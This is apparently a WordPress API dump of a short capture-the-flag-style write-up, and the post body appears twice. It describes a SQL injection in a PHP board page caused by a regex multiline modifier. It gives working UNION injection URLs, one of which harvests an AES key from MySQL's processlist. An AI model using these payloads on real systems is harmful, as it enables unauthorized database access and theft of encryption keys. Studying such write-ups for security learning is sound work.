else if($page == “read”){
\n $col = addslashes($_GET[‘col’]);
\n $col = preg_match(“\/^no$\/ismU”,$col) ? $col : “”;
\nThere is SQL Injection vuln at read page because of m modifier<\/p>\n
We can get encrypted content like this.
\nhttp:\/\/ip\/?page=read&col=no%0a=0%20union%20select%201,content,3,4%20from%20board%20where%20no=1%23&no=1\u200b<\/p>\n
We need aeskey but mysql user board can’t access aeskey database.<\/p>\n
$contentdec = mysql_fetch_array(mysql_query(“select *,
\n aes_decrypt(unhex(content),unhex(‘”.$aeskey[‘aeskey’].”‘)) as plain
\n from(select * from board.board join member.members) as a where no='”.$no.”‘”));
\nAt line 139, board(mysql user) query aeskey as plain text.<\/p>\n
Every mysql query viewed at information_schema.processlist.info
\nIf we select it repeatedly, we can get aeskey.
\nhttp:\/\/ip\/?page=read&col=no%0a=0%20union%20select%201,1,3,@a:=0x3a3a%20union%20select%201,2,3,@tmp:=0x20%20union%20select%201,3,3,benchmark(200000,(@tmp:=%20(%20select%20Group_concat(info)%20from%20information_schema.processlist%20where%20info%20not%20like%200x254d49544d5f53514c495f50574e25%20
\nor%20sleep(0)\/*MITM_SQLI_PWN*\/))^(if((@tmp!=0x00)%26%26(@a%20not%20like%20concat(0x253a3a,replace(@tmp,0x0a,0x5c5c6e),0x3a3a25)),@a:=concat(@a,
\nreplace(@tmp,0x0a,0x5c6e),0x3a3a),0)))%20union%20select%201,@a,3,4%20limit%203,1%23&no=1<\/p>\n","protected":false},"excerpt":{"rendered":"
else if($page == “read”){ $col = addslashes($_GET[‘col’]); $col = preg_match(“\/^no$\/ismU”,$col) ? $col : “”; There is SQL Injection vuln at read page because of m modifier We can get encrypted content like this. http:\/\/ip\/?page=read&col=no%0a=0%20union%20select%201,content,3,4%20from%20board%20where%20no=1%23&no=1\u200b We need aeskey but mysql user board can’t access aeskey database. $contentdec = mysql_fetch_array(mysql_query(“select *, aes_decrypt(unhex(content),unhex(‘”.$aeskey[‘aeskey’].”‘)) as plain from(select * from board.board join member.members) as a where no=’”.$no.”‘”)); At line 139, board(mysql user) query aeskey as plain text. Every mysql query viewed at information_schema.processlist.info If we select it repeatedly, we can get aeskey. http:\/\/ip\/?page=read&col=no%0a=0%20union%20select%201,1,3,@a:=0x3a3a%20union%20select%201,2,3,@tmp:=0x20%20union%20select%201,3,3,benchmark(200000,(@tmp:=%20(%20select%20Group_concat(info)%20from%20information_schema.processlist%20where%20info%20not%20like%200x254d49544d5f53514c495f50574e25%20 or%20sleep(0)\/*MITM_SQLI_PWN*\/))^(if((@tmp!=0x00)%26%26(@a%20not%20like%20concat(0x253a3a,replace(@tmp,0x0a,0x5c5c6e),0x3a3a25)),@a:=concat(@a, replace(@tmp,0x0a,0x5c6e),0x3a3a),0)))%20union%20select%201,@a,3,4%20limit%203,1%23&no=1<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[3],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/62"}],"collection":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/comments?post=62"}],"version-history":[{"count":2,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/62\/revisions"}],"predecessor-version":[{"id":85,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/posts\/62\/revisions\/85"}],"wp:attachment":[{"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/media?parent=62"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/categories?post=62"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.rubiya.kr\/index.php\/wp-json\/wp\/v2\/tags?post=62"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}